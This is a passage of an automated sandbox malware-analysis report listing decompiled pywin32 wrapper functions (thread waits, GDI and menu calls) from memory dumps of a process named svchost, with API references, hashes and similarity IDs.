                            			E6DA91200(void* __eflags, intOrPtr _a4, long _a8, long _a12, long _a16) {
				long _v4;
				HANDLE* _v8;
				void* _t12;
				long _t13;
				void* _t15;
				long _t16;
				void* _t18;

				_t12 = E6DA91050( &_v8, _a4,  &_v8,  &_v4);
				if(_t12 != 0) {
					__imp__PyEval_SaveThread(_t18, _t15);
					_t13 = MsgWaitForMultipleObjectsEx(_v4, _v8, _a8, _a12, _a16);
					_t16 = _t13;
					__imp__PyEval_RestoreThread(_t12);
					if(_t16 != 0xffffffff) {
						__imp__PyLong_FromLong(_t16);
					} else {
						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("MsgWaitForMultipleObjectsEx", 0);
					}
					free(_v8);
					return _t13;
				} else {
					return _t12;
				}
			}










                            0x6da91211
                            0x6da9121b
                            0x6da91223
                            0x6da9123f
                            0x6da91246
                            0x6da91248
                            0x6da91254
                            0x6da91269
                            0x6da91256
                            0x6da9125d
                            0x6da91263
                            0x6da91278
                            0x6da91288
                            0x6da91220
                            0x6da91220
                            0x6da91220

                            APIs
                              • Part of subcall function 6DA91050: PySequence_Check.PYTHON38(?), ref: 6DA91057
                              • Part of subcall function 6DA91050: PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PyEval_SaveThread.PYTHON38 ref: 6DA91223
                            • MsgWaitForMultipleObjectsEx.USER32 ref: 6DA9123F
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA91248
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(MsgWaitForMultipleObjectsEx,00000000), ref: 6DA9125D
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DA91278
                            Strings
                            • MsgWaitForMultipleObjectsEx, xrefs: 6DA91258
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$CheckErr_Error@@MultipleObjectsRestoreSaveSequence_StringU_object@@WaitWin_free
                            • String ID: MsgWaitForMultipleObjectsEx
                            • API String ID: 3294986040-1368896270
                            • Opcode ID: 17a7db5ce02db75a95e6444277f3ce990ac0ef48142d92302167939b46608702
                            • Instruction ID: 5775024992b39ba498e29a6a85330171292cb6582c50d2eebb7c67876aed7c7d
                            • Opcode Fuzzy Hash: 17a7db5ce02db75a95e6444277f3ce990ac0ef48142d92302167939b46608702
                            • Instruction Fuzzy Hash: FE01DF7581C300ABCF002BA4EC45A6A7AF8BF4E21AF048934F955D5150E73689299BA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91170, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E6DA91170(void* __eflags, intOrPtr _a4, int _a8, long _a12, long _a16) {
				long _v4;
				HANDLE* _v8;
				void* _t12;
				long _t13;
				void* _t15;
				long _t16;
				void* _t18;

				_t12 = E6DA91050( &_v8, _a4,  &_v8,  &_v4);
				if(_t12 != 0) {
					__imp__PyEval_SaveThread(_t18, _t15);
					_t13 = MsgWaitForMultipleObjects(_v4, _v8, _a8, _a12, _a16);
					_t16 = _t13;
					__imp__PyEval_RestoreThread(_t12);
					if(_t16 != 0xffffffff) {
						__imp__PyLong_FromLong(_t16);
					} else {
						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("MsgWaitForMultipleObjects", 0);
					}
					free(_v8);
					return _t13;
				} else {
					return _t12;
				}
			}










                            0x6da91181
                            0x6da9118b
                            0x6da91193
                            0x6da911af
                            0x6da911b6
                            0x6da911b8
                            0x6da911c4
                            0x6da911d9
                            0x6da911c6
                            0x6da911cd
                            0x6da911d3
                            0x6da911e8
                            0x6da911f8
                            0x6da91190
                            0x6da91190
                            0x6da91190

                            APIs
                              • Part of subcall function 6DA91050: PySequence_Check.PYTHON38(?), ref: 6DA91057
                              • Part of subcall function 6DA91050: PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PyEval_SaveThread.PYTHON38 ref: 6DA91193
                            • MsgWaitForMultipleObjects.USER32 ref: 6DA911AF
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA911B8
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(MsgWaitForMultipleObjects,00000000), ref: 6DA911CD
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DA911E8
                            Strings
                            • MsgWaitForMultipleObjects, xrefs: 6DA911C8
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$CheckErr_Error@@MultipleObjectsRestoreSaveSequence_StringU_object@@WaitWin_free
                            • String ID: MsgWaitForMultipleObjects
                            • API String ID: 3294986040-3213911756
                            • Opcode ID: 00577faf9534403a297f48ad247e99d0e15a096dca1b6e3ef19a1706f50d0a73
                            • Instruction ID: adce253840081b8e6643889586667b130cfe5f65bd232d9fb1aef46982186ae4
                            • Opcode Fuzzy Hash: 00577faf9534403a297f48ad247e99d0e15a096dca1b6e3ef19a1706f50d0a73
                            • Instruction Fuzzy Hash: CD01F27581C300ABCF001BA4FC45A6A7AF8BF4D21AF148938F99595190EB36C9399B97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91290, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E6DA91290(void* __eflags, intOrPtr _a4, int _a8, long _a12) {
				long _v4;
				HANDLE* _v8;
				void* _t11;
				long _t12;
				void* _t14;
				long _t15;
				void* _t17;

				_t11 = E6DA91050( &_v8, _a4,  &_v8,  &_v4);
				if(_t11 != 0) {
					__imp__PyEval_SaveThread(_t17, _t14);
					_t12 = WaitForMultipleObjects(_v4, _v8, _a8, _a12);
					_t15 = _t12;
					__imp__PyEval_RestoreThread(_t11);
					if(_t15 != 0xffffffff) {
						__imp__PyLong_FromLong(_t15);
					} else {
						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("WaitForMultipleObjects", 0);
					}
					free(_v8);
					return _t12;
				} else {
					return _t11;
				}
			}










                            0x6da912a1
                            0x6da912ab
                            0x6da912b3
                            0x6da912cb
                            0x6da912d2
                            0x6da912d4
                            0x6da912e0
                            0x6da912f5
                            0x6da912e2
                            0x6da912e9
                            0x6da912ef
                            0x6da91304
                            0x6da91314
                            0x6da912b0
                            0x6da912b0
                            0x6da912b0

                            APIs
                              • Part of subcall function 6DA91050: PySequence_Check.PYTHON38(?), ref: 6DA91057
                              • Part of subcall function 6DA91050: PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PyEval_SaveThread.PYTHON38 ref: 6DA912B3
                            • WaitForMultipleObjects.KERNEL32(?,?,?,?), ref: 6DA912CB
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA912D4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(WaitForMultipleObjects,00000000), ref: 6DA912E9
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DA91304
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$CheckErr_Error@@MultipleObjectsRestoreSaveSequence_StringU_object@@WaitWin_free
                            • String ID: WaitForMultipleObjects
                            • API String ID: 3294986040-3113178308
                            • Opcode ID: bb1729fd2711d8edd7243138668bfe74f03d288763616a41e9a910c5ae09f1eb
                            • Instruction ID: 39656edf32e8c70dd32ec7e76dc979977c2c705e954a0b6d056bd57af9ea16cc
                            • Opcode Fuzzy Hash: bb1729fd2711d8edd7243138668bfe74f03d288763616a41e9a910c5ae09f1eb
                            • Instruction Fuzzy Hash: F201267581C301ABCF016BA4EC49A6A7BF8FF4E219F048531FD21C5250EB76882D9B97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA9D30, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:SetWindowExtEx,?,?,?), ref: 6DAA9D4B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9D67
                            • SetWindowExtEx.GDI32(?,?,?,?), ref: 6DAA9D85
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWindowExtEx,00000000), ref: 6DAA9D95
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParseTupleWin_Window
                            • String ID: Oii:SetWindowExtEx$SetWindowExtEx
                            • API String ID: 1987995377-1745722152
                            • Opcode ID: a377f8a9881a252df4f223545286b6fbdfcbf80037b4ee1e10afc2440f4273be
                            • Instruction ID: dfeec19217c382ce47d1f48b26a334e47a7b456780147952d90a8d127d5c042b
                            • Opcode Fuzzy Hash: a377f8a9881a252df4f223545286b6fbdfcbf80037b4ee1e10afc2440f4273be
                            • Instruction Fuzzy Hash: 3401F47640C201BFDB01AF55CD45DAB7BBDBF84205F888968F985C1032E732C96A9B93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAA5E0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiik:SetPixel,?,?,?,?), ref: 6DAAA600
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAA61C
                            • SetPixel.GDI32(?,?,?,?), ref: 6DAAA639
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetPixel,00000000), ref: 6DAAA64B
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParsePixelTupleWin_
                            • String ID: Oiik:SetPixel$SetPixel
                            • API String ID: 2935145084-2504120362
                            • Opcode ID: cee15d4fa53f3e7dcb14182df911f8ac37f516eaa75e9f88e27607081fc872c7
                            • Instruction ID: 0faa4441b50c15530b7136fc32952f4880b90a7c453cc1cc94de92aa8420f0b7
                            • Opcode Fuzzy Hash: cee15d4fa53f3e7dcb14182df911f8ac37f516eaa75e9f88e27607081fc872c7
                            • Instruction Fuzzy Hash: AB0184B940C201BFCB009F54DD45E5B77F9BF44601F888A29F956C1061E331D9299BA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB4920, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Ol:SetBkColor,?,?), ref: 6DAB493D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB4959
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB4968
                            • SetBkColor.GDI32(?,?), ref: 6DAB4978
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4981
                            • Py_BuildValue.PYTHON38(6DABBCB0,00000000), ref: 6DAB498D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildColorObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: Ol:SetBkColor
                            • API String ID: 4268770495-3469434366
                            • Opcode ID: f66d08b9b2e7aecdd03458052aee42df10790a0620ac43631c408c88f7760bb8
                            • Instruction ID: 932b545f1a2d37f18a1942a76a1dbb9ab2ef7cccd3d5b0b4d4cb446b260b63b0
                            • Opcode Fuzzy Hash: f66d08b9b2e7aecdd03458052aee42df10790a0620ac43631c408c88f7760bb8
                            • Instruction Fuzzy Hash: F6F08136408201AFDB009B25ED89B7B7BBCFF85215F048629FC89C1121E775895ADB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB38C0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:GetMenuItemID,?,?), ref: 6DAB38DD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB38F9
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB3908
                            • GetMenuItemID.USER32(?,?), ref: 6DAB3918
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB3921
                            • Py_BuildValue.PYTHON38(6DABF4A8,00000000), ref: 6DAB392D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildItemMenuObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: Oi:GetMenuItemID
                            • API String ID: 406585752-17796478
                            • Opcode ID: c77f9f7264bd2fe5ee429a85e2759083a93827f491833c1c6d26901e74eb95a7
                            • Instruction ID: 07d583dac981f97bb43115db6eb0d2aa5f761a00c58dd08bbec671281b55a798
                            • Opcode Fuzzy Hash: c77f9f7264bd2fe5ee429a85e2759083a93827f491833c1c6d26901e74eb95a7
                            • Instruction Fuzzy Hash: BFF08135408201AFDB005B65DD49A6B7BB8FF85611F048929FC85C1131E735895ADA93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB4820, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:SetBkMode,?,?), ref: 6DAB483D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB4859
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB4868
                            • SetBkMode.GDI32(?,?), ref: 6DAB4878
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4881
                            • Py_BuildValue.PYTHON38(6DAC28FC,00000000), ref: 6DAB488D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildModeObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: Oi:SetBkMode
                            • API String ID: 2486815254-475507012
                            • Opcode ID: 9f2012c3c3255444ba3380fd17b8fbf399cf3dee342b32f5ec09866a0501bd54
                            • Instruction ID: c04260f6be7cc5f5270b8263667c10bc591ab8b58ea1df7358ab84baabb6d097
                            • Opcode Fuzzy Hash: 9f2012c3c3255444ba3380fd17b8fbf399cf3dee342b32f5ec09866a0501bd54
                            • Instruction Fuzzy Hash: 2EF08C35408201AFDB009F65ED49B6B7BB8FF85215F448929FC89C1121E735896ADB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA9DC0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetViewportExtEx), ref: 6DAA9DD0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9DEC
                            • GetViewportExtEx.GDI32(?,?), ref: 6DAA9E02
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetViewportExtEx,00000000), ref: 6DAA9E12
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParseTupleViewportWin_
                            • String ID: GetViewportExtEx$O:GetViewportExtEx
                            • API String ID: 366590044-2489111063
                            • Opcode ID: 59960905f6c6165f2b1be53403a1cb323cc9f0163d9f0596f754339da0160c5c
                            • Instruction ID: 8a557dbc9623adfd002190115f76bbd23cc6fd0ef4891853fa84866d56b6ce2e
                            • Opcode Fuzzy Hash: 59960905f6c6165f2b1be53403a1cb323cc9f0163d9f0596f754339da0160c5c
                            • Instruction Fuzzy Hash: BCF0187540C201BFDF016B55CD4597A7BB9FF84205F888964FC59C0132F7368A6ADA52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB55D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAB55D0(intOrPtr _a8) {
				long _v4;
				void* __ecx;
				void* _t3;
				struct HBRUSH__* _t4;
				void* _t6;
				void* _t7;
				struct HBRUSH__* _t8;
				void* _t11;
				void* _t15;

				_t3 = _t15;
				__imp__PyArg_ParseTuple(_a8, "l:CreateSolidBrush", _t3);
				if(_t3 != 0) {
					__imp__PyEval_SaveThread(_t7, _t11);
					_t4 = CreateSolidBrush(_v4);
					_t8 = _t4;
					__imp__PyEval_RestoreThread(_t3);
					if(_t8 != 0) {
						return E6DAA5630(_t6, _t8);
					} else {
						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateSolidBrush", _t8);
						return _t4;
					}
				} else {
					return _t3;
				}
			}












                            0x6dab55d1
                            0x6dab55de
                            0x6dab55e9
                            0x6dab55ef
                            0x6dab55fb
                            0x6dab5602
                            0x6dab5604
                            0x6dab560f
                            0x6dab5630
                            0x6dab5611
                            0x6dab5617
                            0x6dab5623
                            0x6dab5623
                            0x6dab55ec
                            0x6dab55ec
                            0x6dab55ec

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,l:CreateSolidBrush), ref: 6DAB55DE
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB55EF
                            • CreateSolidBrush.GDI32(?), ref: 6DAB55FB
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB5604
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateSolidBrush,00000000), ref: 6DAB5617
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BrushCreateError@@ParseRestoreSaveSolidTupleU_object@@Win_
                            • String ID: CreateSolidBrush$l:CreateSolidBrush
                            • API String ID: 1260461327-1421391186
                            • Opcode ID: 85828022c41db3f41713e1de5760c61207aec09f9ceb5c258cfa0d1dac099153
                            • Instruction ID: a45b8372f687a43457f554836e62a1ae6b9109503d2d06b5f29377171e46e999
                            • Opcode Fuzzy Hash: 85828022c41db3f41713e1de5760c61207aec09f9ceb5c258cfa0d1dac099153
                            • Instruction Fuzzy Hash: E8F0E97640C2005FCA012B65FC4C97B3B7DEEC2273B184539F806C1111E731856B96A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0510, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,ii:SetCaretPos,?), ref: 6DAB0525
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB0538
                            • SetCaretPos.USER32(?,?), ref: 6DAB0548
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB0551
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetCaretPos,00000000), ref: 6DAB0567
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_CaretError@@ParseRestoreSaveTupleU_object@@Win_
                            • String ID: SetCaretPos$ii:SetCaretPos
                            • API String ID: 575990338-310743985
                            • Opcode ID: f772bc260c287ccd3612ce51784172e32b84c514c3d3e54ee8cbbdebee33ba84
                            • Instruction ID: 6205213c0a0d429333b200a4395ed4c53c31c65b71723c305bb7c552096b5c15
                            • Opcode Fuzzy Hash: f772bc260c287ccd3612ce51784172e32b84c514c3d3e54ee8cbbdebee33ba84
                            • Instruction Fuzzy Hash: 6EF06276808201AFCF016F65EC45A6A7AB9FF41342F488625FC45D1121E731892BDAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA9CB0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWindowExtEx), ref: 6DAA9CC0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9CDC
                            • GetWindowExtEx.GDI32(?,?), ref: 6DAA9CF2
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetWindowExtEx,00000000), ref: 6DAA9D02
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParseTupleWin_Window
                            • String ID: GetWindowExtEx$O:GetWindowExtEx
                            • API String ID: 1987995377-3732577923
                            • Opcode ID: c75490db5d00da04bfd4f5abd9e956e3738a982e75c926ee32474d83c81be845
                            • Instruction ID: e4eca8d33856779b3dadebda2f9520b0fa2428353dff0720a1b323ce13b3e9cf
                            • Opcode Fuzzy Hash: c75490db5d00da04bfd4f5abd9e956e3738a982e75c926ee32474d83c81be845
                            • Instruction Fuzzy Hash: D5F0447940C205AFDB006B64CD45A3A7BB9FF80205F888964FC99C1132F7328966DA52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAF580, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:ImageList_GetImageCount), ref: 6DAAF597
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF5B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAF5C2
                            • ImageList_GetImageCount.COMCTL32(?), ref: 6DAAF5CE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAF5D7
                            • Py_BuildValue.PYTHON38(6DAC0208,00000000), ref: 6DAAF5E3
                            Strings
                            • O:ImageList_GetImageCount, xrefs: 6DAAF58E
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ImageThread$Arg_BuildCountList_Object_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:ImageList_GetImageCount
                            • API String ID: 98207177-3046038287
                            • Opcode ID: f8bef4163683e46aea108e0c7be33904b543b1594da7528d1e21834d1d374ccc
                            • Instruction ID: 45e5e3ac09a8e1d9e857f5c044ad6be7145272ad01422682495b1c6e2309b9c0
                            • Opcode Fuzzy Hash: f8bef4163683e46aea108e0c7be33904b543b1594da7528d1e21834d1d374ccc
                            • Instruction Fuzzy Hash: 84F06D7540C201AFDF006B66DC4DB6A7BB8EF85216F088629F984C1131E735896ACAA2
                            Uniqueness

